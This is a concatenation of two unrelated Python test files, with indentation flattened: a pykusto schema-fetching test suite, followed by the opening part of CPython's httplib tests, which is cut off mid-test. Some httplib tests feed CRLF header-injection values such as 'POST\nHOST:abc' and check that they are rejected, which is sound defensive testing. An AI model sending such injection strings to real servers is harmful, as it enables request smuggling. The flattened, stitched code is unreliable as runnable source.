from pykusto._src.expressions import _StringColumn, _NumberColumn, _AnyTypeColumn, _BooleanColumn
# noinspection PyProtectedMember
from pykusto._src.type_utils import _KustoType
from test.test_base import TestBase, MockKustoClient, RecordedQuery, mock_tables_response, mock_getschema_response, mock_databases_response
background_query_lock = Lock()
class TestClientFetch(TestBase):
query_thread: Thread = None
query_results: List = []
@staticmethod
def query_in_background(query: Callable[[], Any]):
with background_query_lock:
assert TestClientFetch.query_thread is None
TestClientFetch.query_results.clear()
TestClientFetch.query_thread = Thread(target=lambda: TestClientFetch.query_results.extend(query()))
TestClientFetch.query_thread.start()
@staticmethod
def get_background_query_result():
with background_query_lock:
assert TestClientFetch.query_thread is not None
TestClientFetch.query_thread.join()
TestClientFetch.query_thread = None
return tuple(TestClientFetch.query_results)
def test_column_fetch(self):
mock_client = MockKustoClient(record_metadata=True)
table = PyKustoClient(mock_client, fetch_by_default=False)['test_db']['mock_table']
table.blocking_refresh()
# Fetch query
self.assertEqual(
[RecordedQuery('test_db', '.show table mock_table | project AttributeName, AttributeType | limit 10000')],
mock_client.recorded_queries,
)
# Dot notation
self.assertType(table.foo, _StringColumn)
self.assertType(table.bar, _NumberColumn)
# Bracket notation
self.assertType(table['foo'], _StringColumn)
self.assertType(table['bar'], _NumberColumn)
self.assertType(table['baz'], _AnyTypeColumn)
def test_block_until_fetch_is_done(self):
mock_client = MockKustoClient(block=True, record_metadata=True)
client = PyKustoClient(mock_client)
self.query_in_background(client.get_databases_names)
mock_client.release()
client.wait_for_items()
# Make sure the fetch query was indeed called
assert not mock_client.blocked()
self.assertEqual(self.get_background_query_result(), ('test_db', ))
def test_dir_before_fetch_is_done(self):
mock_client = MockKustoClient(block=True, record_metadata=True)
client = PyKustoClient(mock_client)
self.query_in_background(lambda: dir(client))
# Return the fetch
mock_client.release()
client.wait_for_items()
# Make sure the fetch query was indeed called
assert not mock_client.blocked()
self.assertIn('test_db', self.get_background_query_result())
def test_column_fetch_slow(self):
mock_client = MockKustoClient(block=True)
table = PyKustoClient(mock_client, fetch_by_default=False)['test_db']['mock_table']
table.refresh()
mock_client.wait_until_blocked()
self.assertType(table['foo'], _AnyTypeColumn)
self.assertType(table['bar'], _AnyTypeColumn)
self.assertType(table['baz'], _AnyTypeColumn)
# Return the fetch
mock_client.release()
table.wait_for_items()
# Make sure the fetch query was indeed called
assert not mock_client.blocked()
@patch("pykusto._src.item_fetcher._DEFAULT_GET_ITEM_TIMEOUT_SECONDS", 0.0001)
def test_table_fetch_slower_than_timeout(self):
mock_client = MockKustoClient(block=True)
try:
PyKustoClient(mock_client)['test_db']['mock_table']
finally:
# # Return the fetch
mock_client.release()
def test_query_before_fetch_returned(self):
mock_client = MockKustoClient(block=True, record_metadata=True)
table = PyKustoClient(mock_client, fetch_by_default=False)['test_db']['mock_table']
table.refresh()
mock_client.wait_until_blocked()
mock_client.do_not_block_next_requests()
self.query_in_background(Query(table).take(5).execute)
# Return the fetch
mock_client.release()
table.wait_for_items()
self.get_background_query_result()
# Make sure the fetch query was indeed called
assert not mock_client.blocked()
# Before the fix the order of returned query was reversed
self.assertEqual(
[
RecordedQuery('test_db', '.show table mock_table | project AttributeName, AttributeType | limit 10000'),
RecordedQuery('test_db', 'mock_table | take 5'),
],
mock_client.recorded_queries,
)
def test_table_fetch(self):
mock_client = MockKustoClient(record_metadata=True)
db = PyKustoClient(mock_client, fetch_by_default=False)['test_db']
db.blocking_refresh()
self.assertEqual(
[RecordedQuery('test_db', '.show database schema | project TableName, ColumnName, ColumnType | limit 10000')],
mock_client.recorded_queries,
)
table = db.mock_table
# Table columns
self.assertType(table.foo, _StringColumn)
self.assertType(table.bar, _NumberColumn)
self.assertType(table['baz'], _AnyTypeColumn)
# Bracket notation
self.assertType(db['other_table']['foo'], _AnyTypeColumn)
# Dot notation error
self.assertRaises(
AttributeError("PyKustoClient('test_cluster.kusto.windows.net').Database('test_db') has no attribute 'test_table_1'"),
lambda: db.test_table_1
)
def test_two_tables_fetch(self):
mock_client = MockKustoClient(record_metadata=True)
db = PyKustoClient(mock_client, fetch_by_default=False)['test_db']
db.blocking_refresh()
self.assertEqual(
[RecordedQuery('test_db', '.show database schema | project TableName, ColumnName, ColumnType | limit 10000')],
mock_client.recorded_queries,
)
# Table columns
self.assertType(db.mock_table.foo, _StringColumn)
self.assertType(db.mock_table.bar, _NumberColumn)
self.assertType(db.mock_table_2['baz'], _BooleanColumn)
self.assertType(db['other_table']['foo'], _AnyTypeColumn)
# Union
table = db.get_table('mock_table', 'mock_table_2')
self.assertType(table.foo, _StringColumn)
self.assertType(table.bar, _NumberColumn)
self.assertType(table.baz, _BooleanColumn)
# Wildcard
table = db.get_table('mock_*')
self.assertType(table.foo, _StringColumn)
self.assertType(table.bar, _NumberColumn)
self.assertType(table.baz, _BooleanColumn)
def test_union_column_name_conflict(self):
mock_client = MockKustoClient(
tables_response=mock_tables_response([
('test_table_1', [('foo', _KustoType.STRING), ('bar', _KustoType.INT)]),
('test_table_2', [('foo', _KustoType.BOOL)])
]),
getschema_response=mock_getschema_response([
('foo_string', _KustoType.STRING), ('bar', _KustoType.INT), ('foo_bool', _KustoType.BOOL)
]),
record_metadata=True,
)
db = PyKustoClient(mock_client, fetch_by_default=False)['test_db']
db.blocking_refresh()
table = db.get_table('test_table_*')
table.blocking_refresh() # To trigger name conflict resolution
self.assertEqual(
[
# First trying the usual fetch
RecordedQuery('test_db', '.show database schema | project TableName, ColumnName, ColumnType | limit 10000'),
# Fallback for name conflict resolution
RecordedQuery('test_db', 'union test_table_* | getschema | project ColumnName, DataType | limit 10000')
],
mock_client.recorded_queries,
)
self.assertType(table.foo_string, _StringColumn)
self.assertType(table.bar, _NumberColumn)
self.assertType(table.foo_bool, _BooleanColumn)
def test_union_wildcard_one_table(self):
mock_client = MockKustoClient(record_metadata=True)
db = PyKustoClient(mock_client, fetch_by_default=False)['test_db']
db.blocking_refresh()
self.assertEqual(
[RecordedQuery('test_db', '.show database schema | project TableName, ColumnName, ColumnType | limit 10000')],
mock_client.recorded_queries,
)
table = db.get_table('mock_table_*')
self.assertType(table.foo, _AnyTypeColumn)
self.assertType(table.bar, _AnyTypeColumn)
self.assertType(table['baz'], _BooleanColumn)
def test_database_fetch(self):
mock_client = MockKustoClient(record_metadata=True)
client = PyKustoClient(mock_client)
client.wait_for_items()
self.assertEqual(
[RecordedQuery('', '.show databases schema | project DatabaseName, TableName, ColumnName, ColumnType | limit 100000')],
mock_client.recorded_queries,
)
# Table columns
table = client.test_db.mock_table
self.assertType(table.foo, _StringColumn)
self.assertType(table.bar, _NumberColumn)
self.assertType(table['baz'], _AnyTypeColumn)
self.assertType(client.test_db['other_table']['foo'], _AnyTypeColumn)
# Various utility methods
db = client.get_database('test_db')
self.assertType(db, Database)
self.assertEqual('test_db', db.get_name())
self.assertEqual(('test_db',), tuple(client.get_databases_names()))
self.assertEqual(('mock_table', 'other_table'), tuple(client.test_db.get_table_names()))
self.assertEqual(('foo', 'bar', 'baz'), tuple(client.test_db.mock_table.get_columns_names()))
self.assertTrue({'foo', 'bar'} < set(dir(client.test_db.mock_table)))
self.assertEqual("PyKustoClient('test_cluster.kusto.windows.net').Database('test_db').Table('mock_table')", repr(client.test_db.mock_table))
def test_autocomplete_with_dot(self):
mock_client = MockKustoClient(
databases_response=mock_databases_response([('test_db', [('mock_table', [('foo', _KustoType.STRING), ('bar.baz', _KustoType.INT)])])]),
)
client = PyKustoClient(mock_client)
client.wait_for_items()
# Table columns
table = client.test_db.mock_table
self.assertType(table.foo, _StringColumn)
self.assertType(table.bar, _AnyTypeColumn)
self.assertType(table['bar.baz'], _NumberColumn)
autocomplete_list = set(dir(client.test_db.mock_table))
self.assertIn('foo', autocomplete_list)
self.assertNotIn('bar.baz', autocomplete_list)
def test_exception_from_autocomplete(self):
mock_client = MockKustoClient(databases_response=self.raise_mock_exception)
client = PyKustoClient(mock_client, fetch_by_default=True)
autocomplete_list = set(dir(client))
self.assertNotIn('test_db', autocomplete_list)
def test_empty_database(self):
mock_client = MockKustoClient(
databases_response=mock_databases_response([
('test_db', [('mock_table', [('foo', _KustoType.STRING), ('bar', _KustoType.INT)])]),
('', [('test_table1', [('foo1', _KustoType.STRING), ('bar1', _KustoType.INT)])])
]),
record_metadata=True,
)
client = PyKustoClient(mock_client)
client.wait_for_items()
self.assertEqual(
[RecordedQuery('', '.show databases schema | project DatabaseName, TableName, ColumnName, ColumnType | limit 100000')],
mock_client.recorded_queries,
)
self.assertType(client.test_db.mock_table.foo, _StringColumn)
def test_client_database_names_not_fetched(self):
client = PyKustoClient(MockKustoClient(), fetch_by_default=False)
self.assertEqual(frozenset(['test_db']), set(client.get_databases_names()))
def test_client_databases_not_fetched(self):
client = PyKustoClient(MockKustoClient(), fetch_by_default=False)
self.assertEqual(frozenset(['test_db']), set(db.get_name() for db in client.get_databases()))
def test_exception_while_fetching(self):
client = PyKustoClient(MockKustoClient(databases_response=self.raise_mock_exception))
self.assertRaises(
Exception("Mock exception"),
lambda: set(client.get_databases_names()),
)
|
test_httplib.py
|
import errno
from http import client
import io
import itertools
import os
import array
import re
import socket
import threading
import unittest
TestCase = unittest.TestCase
from test import support
here = os.path.dirname(__file__)
# Self-signed cert file for 'localhost'
CERT_localhost = os.path.join(here, 'keycert.pem')
# Self-signed cert file for 'fakehostname'
CERT_fakehostname = os.path.join(here, 'keycert2.pem')
# Self-signed cert file for self-signed.pythontest.net
CERT_selfsigned_pythontestdotnet = os.path.join(here, 'selfsigned_pythontestdotnet.pem')
# constants for testing chunked encoding
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd! \r\n'
'8\r\n'
'and now \r\n'
'22\r\n'
'for something completely different\r\n'
)
chunked_expected = b'hello world! and now for something completely different'
chunk_extension = ";foo=bar"
last_chunk = "0\r\n"
last_chunk_extended = "0" + chunk_extension + "\r\n"
trailers = "X-Dummy: foo\r\nX-Dumm2: bar\r\n"
chunked_end = "\r\n"
HOST = support.HOST
class FakeSocket:
def __init__(self, text, fileclass=io.BytesIO, host=None, port=None):
if isinstance(text, str):
text = text.encode("ascii")
self.text = text
self.fileclass = fileclass
self.data = b''
self.sendall_calls = 0
self.file_closed = False
self.host = host
self.port = port
def sendall(self, data):
self.sendall_calls += 1
self.data += data
def makefile(self, mode, bufsize=None):
if mode != 'r' and mode != 'rb':
raise client.UnimplementedFileMode()
# keep the file around so we can check how much was read from it
self.file = self.fileclass(self.text)
self.file.close = self.file_close #nerf close ()
return self.file
def file_close(self):
self.file_closed = True
def close(self):
pass
def setsockopt(self, level, optname, value):
pass
class EPipeSocket(FakeSocket):
def __init__(self, text, pipe_trigger):
# When sendall() is called with pipe_trigger, raise EPIPE.
FakeSocket.__init__(self, text)
self.pipe_trigger = pipe_trigger
def sendall(self, data):
if self.pipe_trigger in data:
raise OSError(errno.EPIPE, "gotcha")
self.data += data
def close(self):
pass
class NoEOFBytesIO(io.BytesIO):
"""Like BytesIO, but raises AssertionError on EOF.
This is used below to test that http.client doesn't try to read
more from the underlying file than it should.
"""
def read(self, n=-1):
data = io.BytesIO.read(self, n)
if data == b'':
raise AssertionError('caller tried to read past EOF')
return data
def readline(self, length=None):
data = io.BytesIO.readline(self, length)
if data == b'':
raise AssertionError('caller tried to read past EOF')
return data
class FakeSocketHTTPConnection(client.HTTPConnection):
"""HTTPConnection subclass using FakeSocket; counts connect() calls"""
def __init__(self, *args):
self.connections = 0
super().__init__('example.com')
self.fake_socket_args = args
self._create_connection = self.create_connection
def connect(self):
"""Count the number of times connect() is invoked"""
self.connections += 1
return super().connect()
def create_connection(self, *pos, **kw):
return FakeSocket(*self.fake_socket_args)
class HeaderTests(TestCase):
def test_auto_headers(self):
# Some headers are added automatically, but should not be added by
# .request() if they are explicitly set.
class HeaderCountingBuffer(list):
def __init__(self):
self.count = {}
def append(self, item):
kv = item.split(b':')
if len(kv) > 1:
# item is a 'Key: Value' header string
lcKey = kv[0].decode('ascii').lower()
self.count.setdefault(lcKey, 0)
self.count[lcKey] += 1
list.append(self, item)
for explicit_header in True, False:
for header in 'Content-length', 'Host', 'Accept-encoding':
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('blahblahblah')
conn._buffer = HeaderCountingBuffer()
body = 'spamspamspam'
headers = {}
if explicit_header:
headers[header] = str(len(body))
conn.request('POST', '/', body, headers)
self.assertEqual(conn._buffer.count[header.lower()], 1)
def test_content_length_0(self):
class ContentLengthChecker(list):
def __init__(self):
list.__init__(self)
self.content_length = None
def append(self, item):
kv = item.split(b':', 1)
if len(kv) > 1 and kv[0].lower() == b'content-length':
self.content_length = kv[1].strip()
list.append(self, item)
# Here, we're testing that methods expecting a body get a
# content-length set to zero if the body is empty (either None or '')
bodies = (None, '')
methods_with_body = ('PUT', 'POST', 'PATCH')
for method, body in itertools.product(methods_with_body, bodies):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', body)
self.assertEqual(
conn._buffer.content_length, b'0',
'Header Content-Length incorrect on {}'.format(method)
)
# For these methods, we make sure that content-length is not set when
# the body is None because it might cause unexpected behaviour on the
# server.
methods_without_body = (
'GET', 'CONNECT', 'DELETE', 'HEAD', 'OPTIONS', 'TRACE',
)
for method in methods_without_body:
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', None)
self.assertEqual(
conn._buffer.content_length, None,
'Header Content-Length set for empty body on {}'.format(method)
)
# If the body is set to '', that's considered to be "present but
# empty" rather than "missing", so content length would be set, even
# for methods that don't expect a body.
for method in methods_without_body:
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', '')
self.assertEqual(
conn._buffer.content_length, b'0',
'Header Content-Length incorrect on {}'.format(method)
)
# If the body is set, make sure Content-Length is set.
for method in itertools.chain(methods_without_body, methods_with_body):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', ' ')
self.assertEqual(
conn._buffer.content_length, b'1',
'Header Content-Length incorrect on {}'.format(method)
)
def test_putheader(self):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn.putrequest('GET','/')
conn.putheader('Content-length', 42)
self.assertIn(b'Content-length: 42', conn._buffer)
conn.putheader('Foo', ' bar ')
self.assertIn(b'Foo: bar ', conn._buffer)
conn.putheader('Bar', '\tbaz\t')
self.assertIn(b'Bar: \tbaz\t', conn._buffer)
conn.putheader('Authorization', 'Bearer mytoken')
self.assertIn(b'Authorization: Bearer mytoken', conn._buffer)
conn.putheader('IterHeader', 'IterA', 'IterB')
self.assertIn(b'IterHeader: IterA\r\n\tIterB', conn._buffer)
conn.putheader('LatinHeader', b'\xFF')
self.assertIn(b'LatinHeader: \xFF', conn._buffer)
conn.putheader('Utf8Header', b'\xc3\x80')
self.assertIn(b'Utf8Header: \xc3\x80', conn._buffer)
conn.putheader('C1-Control', b'next\x85line')
self.assertIn(b'C1-Control: next\x85line', conn._buffer)
conn.putheader('Embedded-Fold-Space', 'is\r\n allowed')
self.assertIn(b'Embedded-Fold-Space: is\r\n allowed', conn._buffer)
conn.putheader('Embedded-Fold-Tab', 'is\r\n\tallowed')
self.assertIn(b'Embedded-Fold-Tab: is\r\n\tallowed', conn._buffer)
conn.putheader('Key Space', 'value')
self.assertIn(b'Key Space: value', conn._buffer)
conn.putheader('KeySpace ', 'value')
self.assertIn(b'KeySpace : value', conn._buffer)
conn.putheader(b'Nonbreak\xa0Space', 'value')
self.assertIn(b'Nonbreak\xa0Space: value', conn._buffer)
conn.putheader(b'\xa0NonbreakSpace', 'value')
self.assertIn(b'\xa0NonbreakSpace: value', conn._buffer)
def test_ipv6host_header(self):
# Default host header on IPv6 transaction should be wrapped by [] if
# it is an IPv6 address
expected = b'GET /foo HTTP/1.1\r\nHost: [2001::]:81\r\n' \
b'Accept-Encoding: identity\r\n\r\n'
conn = client.HTTPConnection('[2001::]:81')
sock = FakeSocket('')
conn.sock = sock
conn.request('GET', '/foo')
self.assertTrue(sock.data.startswith(expected))
expected = b'GET /foo HTTP/1.1\r\nHost: [2001:102A::]\r\n' \
b'Accept-Encoding: identity\r\n\r\n'
conn = client.HTTPConnection('[2001:102A::]')
sock = FakeSocket('')
conn.sock = sock
conn.request('GET', '/foo')
self.assertTrue(sock.data.startswith(expected))
def test_malformed_headers_coped_with(self):
# Issue 19996
body = "HTTP/1.1 200 OK\r\nFirst: val\r\n: nval\r\nSecond: val\r\n\r\n"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.getheader('First'), 'val')
self.assertEqual(resp.getheader('Second'), 'val')
def test_parse_all_octets(self):
# Ensure no valid header field octet breaks the parser
body = (
b'HTTP/1.1 200 OK\r\n'
b"!#$%&'*+-.^_`|~: value\r\n" # Special token characters
b'VCHAR: ' + bytes(range(0x21, 0x7E + 1)) + b'\r\n'
b'obs-text: ' + bytes(range(0x80, 0xFF + 1)) + b'\r\n'
b'obs-fold: text\r\n'
b' folded with space\r\n'
b'\tfolded with tab\r\n'
b'Content-Length: 0\r\n'
b'\r\n'
)
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.getheader('Content-Length'), '0')
self.assertEqual(resp.msg['Content-Length'], '0')
self.assertEqual(resp.getheader("!#$%&'*+-.^_`|~"), 'value')
self.assertEqual(resp.msg["!#$%&'*+-.^_`|~"], 'value')
vchar = ''.join(map(chr, range(0x21, 0x7E + 1)))
self.assertEqual(resp.getheader('VCHAR'), vchar)
self.assertEqual(resp.msg['VCHAR'], vchar)
self.assertIsNotNone(resp.getheader('obs-text'))
self.assertIn('obs-text', resp.msg)
for folded in (resp.getheader('obs-fold'), resp.msg['obs-fold']):
self.assertTrue(folded.startswith('text'))
self.assertIn(' folded with space', folded)
self.assertTrue(folded.endswith('folded with tab'))
def test_invalid_headers(self):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('')
conn.putrequest('GET', '/')
# http://tools.ietf.org/html/rfc7230#section-3.2.4, whitespace is no
# longer allowed in header names
cases = (
(b'Invalid\r\nName', b'ValidValue'),
(b'Invalid\rName', b'ValidValue'),
(b'Invalid\nName', b'ValidValue'),
(b'\r\nInvalidName', b'ValidValue'),
(b'\rInvalidName', b'ValidValue'),
(b'\nInvalidName', b'ValidValue'),
(b' InvalidName', b'ValidValue'),
(b'\tInvalidName', b'ValidValue'),
(b'Invalid:Name', b'ValidValue'),
(b':InvalidName', b'ValidValue'),
(b'ValidName', b'Invalid\r\nValue'),
(b'ValidName', b'Invalid\rValue'),
(b'ValidName', b'Invalid\nValue'),
(b'ValidName', b'InvalidValue\r\n'),
(b'ValidName', b'InvalidValue\r'),
(b'ValidName', b'InvalidValue\n'),
)
for name, value in cases:
with self.subTest((name, value)):
with self.assertRaisesRegex(ValueError, 'Invalid header'):
conn.putheader(name, value)
def test_headers_debuglevel(self):
body = (
b'HTTP/1.1 200 OK\r\n'
b'First: val\r\n'
b'Second: val1\r\n'
b'Second: val2\r\n'
)
sock = FakeSocket(body)
resp = client.HTTPResponse(sock, debuglevel=1)
with support.captured_stdout() as output:
resp.begin()
lines = output.getvalue().splitlines()
self.assertEqual(lines[0], "reply: 'HTTP/1.1 200 OK\\r\\n'")
self.assertEqual(lines[1], "header: First: val")
self.assertEqual(lines[2], "header: Second: val1")
self.assertEqual(lines[3], "header: Second: val2")
class HttpMethodTests(TestCase):
def test_invalid_method_names(self):
methods = (
'GET\r',
'POST\n',
'PUT\n\r',
'POST\nValue',
'POST\nHOST:abc',
'GET\nrHost:abc\n',
'POST\rRemainder:\r',
'GET\rHOST:\n',
'\nPUT'
)
for method in methods:
with self.assertRaisesRegex(
ValueError, "method can't contain control characters"):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn.request(method=method, url="/")
class TransferEncodingTest(TestCase):
expected_body = b"It's just a flesh wound"
def test_endheaders_chunked(self):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.putrequest('POST', '/')
conn.endheaders(self._make_body(), encode_chunked=True)
_, _, body = self._parse_request(conn.sock.data)
body = self._parse_chunked(body)
self.assertEqual(body, self.expected_body)
def test_explicit_headers(self):
# explicit chunked
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
# this shouldn't actually be automatically chunk-encoded because the
# calling code has explicitly stated that it's taking care of it
conn.request(
'POST', '/', self._make_body(), {'Transfer-Encoding': 'chunked'})
_, headers, body = self._parse_request(conn.sock.data)
self.assertNotIn('content-length', [k.lower() for k in headers.keys()])
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
self.assertEqual(body, self.expected_body)
# explicit chunked, string body
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request(
'POST', '/', self.expected_body.decode('latin-1'),
{'Transfer-Encoding': 'chunked'})
_, headers, body = self._parse_request(conn.sock.data)
self.assertNotIn('content-length', [k.lower() for k in headers.keys()])
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
self.assertEqual(body, self.expected_body)
# User-specified TE, but request() does the chunk encoding
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request('POST', '/',
headers={'Transfer-Encoding': 'gzip, chunked'},
encode_chunked=True,
body=self._make_body())
_, headers, body = self._parse_request(conn.sock.data)
self.assertNotIn('content-length', [k.lower() for k in headers])
self.assertEqual(headers['Transfer-Encoding'], 'gzip, chunked')
self.assertEqual(self._parse_chunked(body), self.expected_body)
def test_request(self):
for empty_lines in (False, True,):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request(
'POST', '/', self._make_body(empty_lines=empty_lines))
_, headers, body = self._parse_request(conn.sock.data)
body = self._parse_chunked(body)
self.assertEqual(body, self.expected_body)
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
# Content-Length and Transfer-Encoding SHOULD not be sent in the
# same request
self.assertNotIn('content-length', [k.lower() for k in headers])
def test_empty_body(self):
# Zero-length iterable should be treated like any other iterable
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request('POST', '/', ())
_, headers, body = self._parse_request(conn.sock.data)
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
self.assertNotIn('content-length', [k.lower() for k in headers])
self.assertEqual(body, b"0\r\n\r\n")
def _make_body(self, empty_lines=False):
lines = self.expected_body.split(b' ')
for idx, line in enumerate(lines):
# for testing handling empty lines
if empty_lines and idx % 2:
yield b''
if idx < len(lines) - 1:
yield line + b' '
else:
yield line
def _parse_request(self, data):
lines = data.split(b'\r\n')
request = lines[0]
headers = {}
n = 1
while n < len(lines) and len(lines[n]) > 0:
key, val = lines[n].split(b':')
key = key.decode('latin-1').strip()
headers[key] = val.decode('latin-1').strip()
n += 1
return request, headers, b'\r\n'.join(lines[n + 1:])
def _parse_chunked(self, data):
body = []
trailers = {}
n = 0
lines = data.split(b'\r\n')
# parse body
while True:
size, chunk = lines[n:n+2]
size = int(size, 16)
if size == 0:
n += 1
break
self.assertEqual(size, len(chunk))
body.append(chunk)
n += 2
# we /should/ hit the end chunk, but check against the size of
# lines so we're not stuck in an infinite loop should we get
# malformed data
if n > len(lines):
break
return b''.join(body)
class BasicTest(TestCase):
def test_status_lines(self):
# Test HTTP status lines
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(0), b'') # Issue #20007
self.assertFalse(resp.isclosed())
self.assertFalse(resp.closed)
self.assertEqual(resp.read(), b"Text")
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
body = "HTTP/1.1 400.100 Not Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
self.assertRaises(client.BadStatusLine, resp.begin)
def test_bad_status_repr(self):
exc = client.BadStatusLine('')
self.assertEqual(repr(exc), '''BadStatusLine("''")''')
def test_partial_reads(self):
# if we have Content-Length, HTTPResponse knows when to close itself,
# the same behaviour as when we read the whole thing with read()
body = "HTTP/1.1 200 Ok\r\nContent-Length: 4\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_mixed_reads(self):
# readline() should update the remaining length, so that read() knows
# how much data is left and does not raise IncompleteRead
body = "HTTP/1.1 200 Ok\r\nContent-Length: 13\r\n\r\nText\r\nAnother"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.readline(), b'Text\r\n')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(), b'Another')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_readintos(self):
# if we have Content-Length, HTTPResponse knows when to close itself,
# the same behaviour as when we read the whole thing with read()
body = "HTTP/1.1 200 Ok\r\nContent-Length: 4\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_reads_no_content_length(self):
# when no length is present, the socket should be gracefully closed when
# all data was read
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertEqual(resp.read(1), b'')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_readintos_no_content_length(self):
# when no length is present, the socket should be gracefully closed when
# all data was read
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertTrue(resp.isclosed())
def test_partial_reads_incomplete_body(self):
# if the server shuts down the connection before the whole
# content-length is delivered, the socket is gracefully closed
body = "HTTP/1.1 200 Ok\r\nContent-Length: 10\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertEqual(resp.read(1), b'')
self.assertTrue(resp.isclosed())
def test_partial_readintos_incomplete_body(self):
# if the server shuts down the connection before the whole
# content-length is delivered, the socket is gracefully closed
body = "HTTP/1.1 200 Ok\r\nContent-Length: 10\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_host_port(self):
# Check invalid host_port
for hp in ("www.python.org:abc", "user:password@www.python.org"):
self.assertRaises(client.InvalidURL, client.HTTPConnection, hp)
for hp, h, p in (("[fe80::207:e9ff:fe9b]:8000",
"fe80::207:e9ff:fe9b", 8000),
("www.python.org:80", "www.python.org", 80),
("www.python.org:", "www.python.org", 80),
("www.python.org", "www.python.org", 80),
("[fe80::207:e9ff:fe9b]", "fe80::207:e9ff:fe9b", 80),
("[fe80::207:e9ff:fe9b]:", "fe80::207:e9ff:fe9b", 80)):
c = client.HTTPConnection(hp)
self.assertEqual(h, c.host)
self.assertEqual(p, c.port)
def test_response_headers(self):
# test response with multiple message headers with the same field name.
text = ('HTTP/1.1 200 OK\r\n'
'Set-Cookie: Customer="WILE_E_COYOTE"; '
'Version="1"; Path="/acme"\r\n'
'Set-Cookie: Part_Number="Rocket_Launcher_0001"; Version="1";'
' Path="/acme"\r\n'
'\r\n'
'No body\r\n')
hdr = ('Customer="WILE_E_COYOTE"; Version="1"; Path="/acme"'
', '
'Part_Number="Rocket_Launcher_0001"; Version="1"; Path="/acme"')
s = FakeSocket(text)
r = client.HTTPResponse(s)
r.begin()
cookies = r.getheader("Set-Cookie")
self.assertEqual(cookies, hdr)
def test_read_head(self):
# Test that the library doesn't attempt to read any data
# from a HEAD request. (Tickles SF bug #622042.)
sock = FakeSocket(
'HTTP/1.1 200 OK\r\n'
'Content-Length: 14432\r\n'
'\r\n',
NoEOFBytesIO)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
if resp.read():
self.fail("Did not expect response from HEAD request")
def test_readinto_head(self):
# Test that the library doesn't attempt to read any data
# from a HEAD request. (Tickles SF bug #622042.)
sock = FakeSocket(
'HTTP/1.1 200 OK\r\n'
'Content-Length: 14432\r\n'
'\r\n',
